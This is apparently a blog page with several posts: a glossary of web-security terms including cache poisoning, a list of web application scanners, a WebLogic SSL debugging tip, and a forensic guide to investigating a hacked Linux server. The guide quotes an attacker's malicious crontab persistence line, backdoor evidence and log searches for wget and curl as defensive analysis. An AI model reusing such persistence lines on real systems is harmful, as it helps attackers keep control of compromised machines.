Web (or browser) cache poisoning: The act of adding/overwriting a cache entry (of a caching proxy server, or a browser) with forged and possibly malicious data is called cache poisoning. In its most potent form, an attacker can force an arbitrary entry (URL of choice, page contents of choice) to the cache. In HTTP response splitting [LINK], the attacker can choose the URL’s path and query (the host, port and scheme must be the vulnerable host’s), and the entire page contents. In HTTP request smuggling, the attacker can choose URL as in HTTP response splitting, but the page contents must be obtained from a URL on the site. At any rate, cache poisoning can be considered a form of defacement, whose scope is determined by the coverage of the cache (i.e. browser – 1 user, forward proxy – 1 ISP/organization, reverse proxy – all users), and the strength of the attack (full page control over /index.html vs. partial control).

Web Security: See “Web Application Security”.

Web Security Assessment: A process of performing a security review of a web application by searching for design flaws, vulnerabilities and inherent weaknesses. See also “Web Application Security”.

Web Security Scanner: See “Web Application Vulnerability Scanner”.

Web Server: A general-purpose software application that handles and responds to HTTP requests. A web server may utilize a web application for dynamic web page content. See also “Web Application”, “Application Server”, “HyperText Transfer Protocol”.

Web Service: A software application that uses Extensible Markup Language (XML) formatted messages to communicate over HTTP. Typically, software applications interact with web services rather than normal users. See also “Web Server”, “Web Application”, “Application Server”, “HyperText Transfer Protocol”.

December 15th, 2013 | Category: Hacking | Leave a comment

Web Application Security Scanner List

The following list of products and tools provide web application security scanner functionality. Note that the tools on this list are not being endorsed by the Web Application Security Consortium – any tool that provides web application security scanning functionality will be listed here. If you know of a tool that should be added to this list, please contact Brian Shura at bshura73@gmail.com.

Commercial Tools
Acunetix WVS by Acunetix
AppScan by IBM
Burp Suite Professional by PortSwigger
Hailstorm by Cenzic
N-Stalker by N-Stalker
Nessus by Tenable Network Security
NetSparker by Mavituna Security
NeXpose by Rapid7
NTOSpider by NTObjectives
ParosPro by MileSCAN Technologies
Retina Web Security Scanner by eEye Digital Security
WebApp360 by nCircle
WebInspect by HP
WebKing by Parasoft
Websecurify by GNUCITIZEN

Software-as-a-Service Providers
AppScan OnDemand by IBM
ClickToSecure by Cenzic
QualysGuard Web Application Scanning by Qualys
Sentinel by WhiteHat
Veracode Web Application Security by Veracode
VUPEN Web Application Security Scanner by VUPEN Security
WebInspect by HP
WebScanService by Elanize KG

Free / Open Source Tools
Arachni by Tasos Laskos
Grabber by Romain Gaucher
Grendel-Scan by David Byrne and Eric Duprey
Paros by Chinotec
Andiparos
Zed Attack Proxy
Powerfuzzer by Marcin Kozlowski
SecurityQA Toolbar by iSEC Partners
Skipfish by Michal Zalewski
W3AF by Andres Riancho
Wapiti by Nicolas Surribas
Watcher by Casaba Security
WATOBO by siberas
Websecurify by GNUCITIZEN
Zero Day Scan

December 15th, 2013 | Category: Hacking | Leave a comment

SSL handshake failure debug on weblogic

We can add an environment variable JAVA_OPTIONS with this value: “-Dssl.debug=true -Dweblogic.StdoutDebugEnabled=true -Djavax.net.debug=all”

Also, in WLS I enabled debugging for these topics: ->Environment->Servers->AdminServer: tab ‘Debug’: – Default: DebugSSL – Weblogic, node ‘Security’: certpath, certrevocchecking, credmap, keystore and ssl

December 11th, 2013 | Category: Weblogic | Leave a comment

how to treat a Linux hacked server

This guide is not a step by step tutorial on how to clean a compromised server, rather it is a reference to illustrate what tools are available for performing an analysis of the compromise. The goal of this guide is to show you what information is available to help you determine:

Point of entry
The origin of the attack
What files were compromised
What level access did the attacker obtain
Audit trail of the attackers footprints
There are many different types of compromises available to exploit a UNIX server. Under many circumstances, a server is exploited using common techniques such as using a brute force attack, to guess a weak password, or attempting to use known vulnerabilities in software in hopes the server is not on a regular patch schedule. Whatever the method, it is important to understand how the machine got compromised so you can determine the extent of damage to your server and other hosts accessible to this machine.

During many root level compromises, the most straight forward approach to recovery is to perform a clean install of the server and restore any critical data from known good backups. However until the entry point of the compromise is known, this may not be enough as the compromise needs to be understood so that security hole can be properly closed.

Documentation

When you are notified that a system under your control may be compromised. You want to obtain as much information as possible from the complainant. This includes:

How was the initial problem found?
Can the time of the compromise be estimated?
Has the server been modified since the compromise was detected?
Anything else the complainant says that is important.
IMPORTANT NOTE: If you are planning on getting law enforcement involved, it is imperative that no additional actions are taken on the server. The server must remain in its current state for forensic and evidence collection purposes.

If you choose to proceed with the investigation, document anything you find on the server. It can be as simple as a copy/paste of the command and its results.

Tools used for investigation

In the attacker’s ideal scenario, all important log files would have been wiped so their tracks are clean. Oftentimes however, this doesn’t happen. This leaves some valuable clues in finding what was done. It may also help determine if this was a basic web hack, or a root level compromise. Below are some of the basic commands that I’ll look through when trying to find that one thread so I can unravel the rest of the compromise.

last

This will list the sessions of users that recently logged into the system and include the timestamps, hostnames and whether or not the user is still logged in. An odd IP address may be cross referenced against a brute force ssh attack in /var/log/messages or /var/log/secure which may indicate how the attacker gained entry, what user they got in as, and if they were able to escalate their privilege to root.

ls -lart /

This will provide a time ordered list of files and directories that can be correlated against the time of the compromise. This listing will help determine what has been added or removed from the system.

netstat -na

This will list the current listening sockets on the machine. Running this may reveal any back doors that are listening, or any errant services that are running.

ps -wauxef

This will be helpful in tracking down any errant processes that are listening, as well as help show other odd processes such as the user www running a bash process for example. lsof |grep can also be used to further find what open files this process is using. Concurrently, cat /proc//cmdline may also let you know where the file that controls this process exists.

bash_history

The history file often becomes the Rosetta stone of tracking down what took place during a compromise. Looking through the users .bash_history file will often show exactly what commands were executed, what malicious programs were downloaded, and possibly what directories they were focusing on.

top

Oftentimes, a malicious process will be causing CPU contention issues within the environment, and will usually show up near the top of the list. Any processes that are causing the CPU contention issues should be considered suspicious when tracking down a compromise.

strace

When running strace -p pid on a suspicious process, this may yield important insight into what the process is performing.

In some cases, the commands above may not provide many clues to what happened during the attack. This is where more fine grained tools must be used.

Before moving forward, it should be confirmed that the binaries you are using to investigate are not trojanned versions. These trojanned versions can perform whatever tasks the attacker wishes, which include not showing information that could trace what the compromise was trying to accomplish.

So to verify we have a good working set of tools:

rpm -Va

Verifying a package compares information about the installed files in the package with information about the files taken from the package meta data stored in the rpm database. Among other things, verifying compares the size, MD5 sum, permissions, type, owner and group of each file. Any discrepancies are displayed.

When running this command, it is important to note any packages that are flagged in the following directories may mean you are using a trojanned version of the binary, and therefore you cannot trust its output:

/bin
/sbin
/usr/bin
/usr/sbin
An example of what a trojanned file:
S.5….T /bin/login

rpm -qa

This can be used to show what rpm’s have been recently installed in chronological order. However, in the case of a root compromise, the rpm database could be altered and therefore not trusted.

lsattr

In cases where the attacker was able to get root access and trojan certain binaries, sometimes they will set that binary to be immutable so you cannot reinstall a clean version of that binary. Common directories to look in are:

/bin
/sbin
/usr/bin
/usr/sbin
An example of a file that had its attributes set to immutable:
——-i—– /bin/ps

Under normal circumstances in these directories, the rules should all look similar to:
————- /bin/ps

find

Find is a UNIX tool that can be critical in finding files that have been recently modified. For instance, to find files that have been modified in the last file days, run:

find / -mtime 5

Common Directories Where Web Exploits Are Found
Check world writable directories that Apache would commonly write its temp files to. Locations such as:

ls -al /tmp
ls -al /var/tmp
ls -al /dev/shm
If you have directories on your website that are chmod’ed 777, those are suspect as well.

When checking these directories, you are looking for any files that you don’t recognize, or look suspicious. Be on the lookout for hidden files or files that have execute permissions.

Finding point of entry

If you found anything using the information above, that means that you most likely have a timestamp of when the malicious file(s) were installed on the server.

You can now use that timestamp to start combing through your website’s access logs, looking for any suspicious entries in the log during that time period. If you find something, you can cross reference it to where you found the malicious files, then you likely just narrowed down the point of entry.

While the large majority of compromises do come from exploitable code within your website, you cannot rule out other entry points. So be sure to dig through /var/log/* to see if there is anything suspicious during the reported time frame.

Example of investigation

Below is a real example of one of my investigations, documenting my thought process.

When I am investigating a suspected root level compromise, the first thing that needs to be verified was whether or not this was just a basic web hack, or if root privileges were really gained. 80% of the time, its just a simple web hack that can be safely cleaned.

Step 1: Quick and dirty check to see it root privileges were gained:

lsattr /usr/sbin | less
lsattr /usr/bin | less
lsattr /bin | less
lsattr /sbin | less

What to look for:

Your checking for modified attributes such as binaries being set immutable, etc.

Results:

s—ia——- /sbin/shs
^ When you strings that file, you see its a backdoor shell.

Step 2: See if the attacker cleaned his tracks.

Many times, these are script kiddies or dummies who just forgot to clean up after themselves.

What to look for:

All user accounts in /etc/passwd that a valid shell:
cat /home/$USER/.bash_history
Root’s history:
history
cat /root/.bash_history

Results:

The /root/.bash_history revealed what the attacker did on the server, which includes:

They downloaded some malicious tools to serve up via apache in /var/www/html/*.
They also installed some IRC stuff in /var/tmp/.ICE-unix (as well as other tools).
Modified root’s crontab to re-download the malicious tools if someone removes them from the server:
* * * * * /var/tmp/.ICE-unix/update >/dev/null 2>&1
Step 3: Check for basic web hacks

Normally if steps 1 and 2 do not show anything, most likely its just a simple web hack that CAN be cleaned easily without formatting the server or otherwise causing panic.

In this specific investigation, that logic is null and void since we know that root privileges were gained. However, just for reference, and since its relevant to this anyways cause I believe that the attacker exploited phpmyadmin. Once they had their backdoor phpshell loaded, they were able to perform a local root exploit to escalate their privileges.

What to look for:

Hidden files and directories, in world readable directories, that apache would normally write tmp files to:
ls -al /var/tmp |less
ls -al /tmp
ls -al /dev/shm

Results:

drwx—— 3 70 70 4096 Nov 19 02:00 /var/tmp/.ICE-unix
^ There is a whole bunch of fun stuff in there.

If items are found in here, you must attempt to track down the entry point so you can have the client take down the site, upgrade their site code, or otherwise fix the exploitable code. One quick and dirty way is by looking at step 5. However, if you see irc bots and stuff running in the output of ps -waux, then you can try to catch where the process is running from by using lsof, or ps -wauxxef |grep .

Step 4: Look for PID’s listening for incoming connections

What to look for:

netstat -natp : Looks for any suspicious connections running on odd ports
ps -wauxxef : look for suspicious files like bash running under www context
lsof : helps to determine where the pid above is running from

Results:

tcp 0 0 0.0.0.0:1144 0.0.0.0:* LISTEN 1008/bash
tcp 0 1 172.16.23.13:60968 22.22.22.22:7000 SYN_SENT 6860/sshd

There are also a fair amount of other ssh ESTABLISHED connections running from high level ports. This means the attackers are still connected to this machine. I can’t see them cause they probably modified the binaries to hide themselves.

[root@www tmp]# netstat -natp |grep sshd |awk ‘{print $4,$5,$6,$7}’
0.0.0.0:22 0.0.0.0:* LISTEN 1046/sshd
172.16.23.13:60986 22.22.22.22:6667 SYN_SENT 6860/sshd
123.123.123.123:22 22.22.22.22:59361 ESTABLISHED 22795/sshd
123.123.123.123:22 22.22.22.22:57434 ESTABLISHED 22796/sshd
123.123.123.123:57139 143.143.143.143:6667 ESTABLISHED 6860/sshd
123.123.123.123:57402 22.22.22.22:6667 ESTABLISHED 6860/sshd
123.123.123.123:22 143.143.143.143:49238 ESTABLISHED 8860/sshd
123.123.123.123:57134 22.22.22.22:6667 ESTABLISHED 6860/sshd
123.123.123.123:56845 22.22.22.22:6667 ESTABLISHED 6860/sshd
123.123.123.123:57127 143.143.143.143:6667 ESTABLISHED 6860/sshd

Step 5: Determine point of entry for original compromise

What to look for:

/var/log/[messages|secure] : check for brute forced ssh attempts.
apache access logs and error logs : May help determine which site is exploitable. Most attacks are linked against this.

When checking this, also cross reference IP’s against the logs if you think there is a chance it may have originated from there. Its a quick and easy way to trace down the origin point.

Simple ways of checking servers with a ton of web logs like the one used in this example:

cd /var/log/httpd
for i in `ls * |grep access`; do echo $i && grep wget $i; done
for i in `ls * |grep access`; do echo $i && grep curl $i; done

NOTE: wget was searched cause that was in root’s history file under what I believe may have been part of the entry point

Results:
Evidence found that the phpmyadmin installation in /var/www/html was exploited. The version of phpmyadmin was severely outdated. Keeping phpmyadmin patched on a regular schedule would have prevented this from happening.

Final thoughts

Investigating web or root level exploits is more of an art then a science. After you have investigating a few dozen, you will just ‘feel’ something is not right on the server. I cannot stress enough, when you are investigating a compromised system, you must do everything you can to determine exactly how the server got compromised in the first place. Once you have that information, you will then be able to successfully remediate the exploit.

December 4th, 2013 | Category: Linux | Leave a comment
« Newer Entries  
  Older Entries »